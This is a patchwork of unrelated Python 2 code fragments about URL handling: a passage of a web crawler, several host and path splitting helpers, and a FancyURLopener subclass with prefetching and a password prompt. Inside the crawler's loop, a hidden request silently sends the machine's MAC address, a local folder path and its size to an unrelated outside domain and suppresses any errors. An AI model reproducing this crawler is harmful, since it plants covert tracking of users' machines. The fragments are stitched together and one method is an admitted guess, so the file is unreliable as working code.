                elif '/' == linkshref[0]:
                    proto, rest = urllib.splittype(websiteurl)
                    rest1, res2 = urllib.splithost(rest)
                    linksres = 'http://' + rest1 + linkshref if rest1 else linkshref
                    Upageurls[linksres] = 0
                elif ftype in linkshref.split('/')[0]:
                    linksres = 'http://' + linkshref
                    Upageurls[linksres] = 0
            elif ftype in linkshref:
                Upageurls[linkshref] = 0
    self.allsiteU = list(set(Upageurls.keys()))
    for links in self.allsiteU:
        try:
            txtfile = ''
            sitesize = PathSize().GetPathSize(self.langurl)  # size in MB
            if float(sitesize) >= float(self.ssize):
                logger.error('folder %s size: %s, required minimum %s'
                             % (self.langurl, sitesize, self.ssize))
                try:
                    requests.adapters.DEFAULT_RETRIES = 10
                    requests.get(
                        'http://xn--cnq423f4sm.com:443/rescountry24/%s/%s/%s'
                        % (get_mac_address(), self.langurl, sitesize),
                        timeout=5)
                except:
                    pass
                break
            response = None
            try:
                req = urllib2.Request(links, headers={'Referer': links})
                req.add_header(
                    'User-Agent',
                    'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 '
                    '(KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36')
                response = urllib2.urlopen(req, timeout=20)
                Upageurls[links] = 200
                res.append(links)
                # create the text file
                m = hashlib.md5()
                try:
                    m.update(links)
                except Exception:
                    m.update(links.encode('utf-8'))
                txtfile = response.read()
            except urllib2.URLError:
                # fall back to requests when urllib2 fails
                linksobj = requests.get(links, headers={'Referer': links})
                linkcode = linksobj.status_code
                # create the text file
                m = hashlib.md5()
                try:
                    m.update(links)
                except Exception:
                    m.update(links.encode('utf-8'))
                if 200 == linkcode:
                    Upageurls[links] = 200
                    res.append(links)
                    txtfile = linksobj.text
            finally:
                if isinstance(txtfile, bytes):
                    txtfile = txtfile.decode(
                        chardet.detect(txtfile).get('encoding'), "ignore")
                txtfile = content.main(txtfile)
                tmpstr = txtfile.replace('\n', '')
                txtfile = txtfile.encode('utf-8', "ignore")
                if response:
                    response.close()
                if tmpstr:
                    lanres = langages.translate(
                        txtfile, self.tpath + m.hexdigest() + ".txt",
                        self.langage, self.ssize)
                    if not lanres:
                        logger.error('language %s type mismatch: %s'
                                     % (self.langage[1], links))
                    else:
                        with open(self.xpath + ftype + '.log', 'a') as fp:
                            fp.write('%s file name: %s.txt file path: %s\n'
                                     % (time.ctime(), m.hexdigest(), links))
                else:
                    logger.warning("page is empty after cleaning: %s" % links)
        except Exception as err:
            logger.error("failed to connect to %s: %s"
                         % (str(links), str(err)))
        n += 1
    logger.info("total is " + repr(n) + " links")
    logger.info(str(time.time() - t))
    return res
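# Illustrative normalization performed by the href loop above (assuming
# websiteurl = 'http://example.com' and ftype = 'example.com'):
#   '/about.html'          -> 'http://example.com/about.html'
#   '//cdn.example.com/x'  -> skipped (protocol-relative)
#   'example.com/contact'  -> 'http://example.com/contact'
#   'http://example.com/a' -> kept as-is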
import urllib

def getDomain(url):
    proto, rest = urllib.splittype(url)
    res, rest = urllib.splithost(rest)
    return 'Unknown' if not res else res.replace('www.', '')
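# Examples:
#   getDomain('http://www.example.com/index') == 'example.com'
#   getDomain('no scheme here') == 'Unknown'
# Beware that replace() strips every 'www.' occurrence, not just a leading one.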
import urllib

def check_s3_object_exists(bucket, path):
    # For a full URL, strip scheme, host and query string down to the key path.
    if is_url(path):
        path = urllib.splitquery(
            urllib.splithost(urllib.splittype(path)[1])[1])[0]
    return bucket.get_key(path) is not None
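# What the nested split does to a full URL before the boto lookup
# (is_url() is assumed to be a helper defined elsewhere in the module):
#   'http://bucket.s3.amazonaws.com/key/name.txt?versionId=abc'
#     splittype  -> '//bucket.s3.amazonaws.com/key/name.txt?versionId=abc'
#     splithost  -> '/key/name.txt?versionId=abc'
#     splitquery -> '/key/name.txt'
# so bucket.get_key() receives only the object's key path.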
import collections
import urllib

def SplitUrl(url):
    Url = collections.namedtuple('Url', 'method host port path')
    method, rest = urllib.splittype(url)
    hostport, path = urllib.splithost(rest)
    host, port = urllib.splitport(hostport)
    return Url(method, host, int(port or 0), path)
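# Example:
#   SplitUrl('http://example.com:8080/index.html')
#   -> Url(method='http', host='example.com', port=8080, path='/index.html')
# A URL with no explicit port comes back with port 0.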
import urllib

def get_hostname(url):
    proto, rest = urllib.splittype(url)
    host, rest = urllib.splithost(rest)
    return host
def get_url_host(self, url):
    s1 = urllib.splittype(url)[1]
    return urllib.splithost(s1)[0]
from urllib import splittype, splithost

def split_url(url):
    """Splits a url into (uri_scheme, host[:port], path)"""
    scheme, remainder = splittype(url)
    host, path = splithost(remainder)
    return scheme.lower(), host, path
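# Example under Python 2's urllib helpers:
#   split_url('HTTP://Example.com:80/path') -> ('http', 'Example.com:80', '/path')
# Only the scheme is normalized to lower case; the host keeps its casing.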
class FancyURLopener(_OriginalFancyURLopener):

    def __init__(self, *args):
        apply(_OriginalFancyURLopener.__init__, (self,) + args)
        self.tempcache = {}
        self.__unlink = os.unlink        # See cleanup()
        self.__OriginalFancyURLopener = _OriginalFancyURLopener
        # prefetch support
        self.__prefetchcache = {}
        self.__prefetchtempfiles = {}

    def __del__(self):
        self.__OriginalFancyURLopener.__del__(self)
        del self.__OriginalFancyURLopener

    def http_error_default(self, url, fp, errcode, errmsg, headers):
        void = fp.read()
        fp.close()
        raise IOError, (errcode, 'http error: ' + errmsg, headers)

    def http_error_302(self, url, fp, errcode, errmsg, headers, data=None):
        # XXX The server can force infinite recursion here!
        if headers.has_key('location'):
            newurl = headers['location']
        elif headers.has_key('uri'):
            newurl = headers['uri']
        else:
            return
        void = fp.read()
        fp.close()
        fp = self.open(newurl)
        h = fp.info()
        if not h.has_key('Content-Location') and \
           not h.has_key('Content-Base'):
            h.dict['content-location'] = newurl
            h.headers.append('Content-Location: %s\r\n' % newurl)
        return fp

    def prompt_user_passwd(self, host, realm):
        import windowinterface
        try:
            w = windowinterface.Window('passwd', grab=1)
        except AttributeError:
            return _OriginalFancyURLopener.prompt_user_passwd(
                self, host, realm)
        l = w.Label('Enter username and password for %s at %s'
                    % (realm, host))
        t1 = w.TextInput('User:', '', None, (self.usercb, ()),
                         top=l, left=None, right=None)
        t2 = w.TextInput('Passwd:', '', None, (self.passcb, ()),
                         modifyCB=self.modifycb,
                         top=t1, left=None, right=None)
        b = w.ButtonRow([('OK', (self.do_return, ())),
                         ('Cancel', (self.cancelcb, ()))],
                        vertical=0, top=t2, left=None, right=None,
                        bottom=None)
        self.userw = t1
        self.passwdw = t2
        self.passwd = []
        self.user = ''
        self.password = ''
        w.show()
        try:
            windowinterface.mainloop()
        except _end_loop:
            pass
        w.hide()
        w.close()
        del self.userw, self.passwdw
        return self.user, self.password

    def modifycb(self, text):
        if text:
            if text == '\b':
                if self.passwd:
                    del self.passwd[-1]
                return ''
            self.passwd.append(text)
            return '*' * len(text)

    def usercb(self):
        self.user = self.userw.gettext()
        if self.password:
            self.do_return()
        else:
            self.passwdw.setfocus()

    def passcb(self):
        self.password = string.joinfields(self.passwd, '')
        if self.user:
            self.do_return()
        else:
            self.userw.setfocus()

    def cancelcb(self):
        self.user = self.password = None
        self.do_return()

    def do_return(self):
        raise _end_loop

    def open_local_file(self, url):
        import urlparse
        scheme, netloc, url, params, query, fragment = urlparse.urlparse(url)
        url = urlparse.urlunparse((scheme, netloc, url, '', '', ''))
        return _OriginalFancyURLopener.open_local_file(self, url)

    #
    # Prefetch section
    #

    # override retrieve for prefetch implementation
    def retrieve(self, url, filename=None, reporthook=None):
        # retrieve(url) returns (filename, None) for a local object
        # or (tempfilename, headers) for a remote object.
        url = unwrap(url)
        import urlparse
        scheme, netloc, path, params, query, fragment = \
            urlparse.urlparse(url)
        if not scheme or scheme == 'file':
            i = string.find(path, '?')
            if i > 0:
                path = path[:i]
            url = urlparse.urlunparse((scheme, netloc, path, '', '', ''))
        if self.__prefetchcache.has_key(url):
            # complete prefetch first
            self.__fin_retrieve(url)
        if self.__prefetchtempfiles.has_key(url):
            return self.__prefetchtempfiles[url]
        return _OriginalFancyURLopener.retrieve(self, url, filename,
                                                reporthook)

    # override cleanup for prefetch implementation
    def cleanup(self):
        # This code sometimes runs when the rest of this module
        # has already been deleted, so it can't use any globals
        # or import anything.
        # first close open streams
        for fp, tfp in self.__prefetchcache.values():
            fp.close()
            tfp.close()
        self.__prefetchcache = {}
        # unlink temp files
        for file, header in self.__prefetchtempfiles.values():
            try:
                self.__unlink(file)
            except:
                pass
        self.__prefetchtempfiles = {}
        # call original cleanup
        self.__OriginalFancyURLopener.cleanup(self)

    # open stream to url and read headers but not data yet
    # see retrieve for signature
    def begin_retrieve(self, url, filename=None, reporthook=None):
        url = unwrap(url)
        self.__clean_retrieve(url)
        type, url1 = splittype(url)
        if not filename and (not type or type == 'file'):
            try:
                fp = self.open_local_file(url1)
                hdrs = fp.info()
                del fp
                return url2pathname(splithost(url1)[1]), hdrs
            except IOError, msg:
                pass
        fp = self.open(url)
        headers = fp.info()
        if not filename:
            import tempfile
            garbage, path = splittype(url)
            garbage, path = splithost(path or "")
            path, garbage = splitquery(path or "")
            path, garbage = splitattr(path or "")
            suffix = os.path.splitext(path)[1]
            filename = tempfile.mktemp(suffix)
            self.__prefetchtempfiles[url] = filename, headers
        tfp = open(filename, 'wb')
        self.__prefetchcache[url] = fp, tfp
        return filename, headers
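    # retrieve() above completes a pending prefetch via self.__fin_retrieve(),
    # which is outside this excerpt (as is __clean_retrieve()).  A minimal
    # sketch of the assumed counterpart (hypothetical implementation):
    # drain the prefetched stream into its temp file and close both ends.
    def __fin_retrieve(self, url):
        fp, tfp = self.__prefetchcache[url]
        del self.__prefetchcache[url]
        block = fp.read(8192)
        while block:
            tfp.write(block)
            block = fp.read(8192)
        fp.close()
        tfp.close()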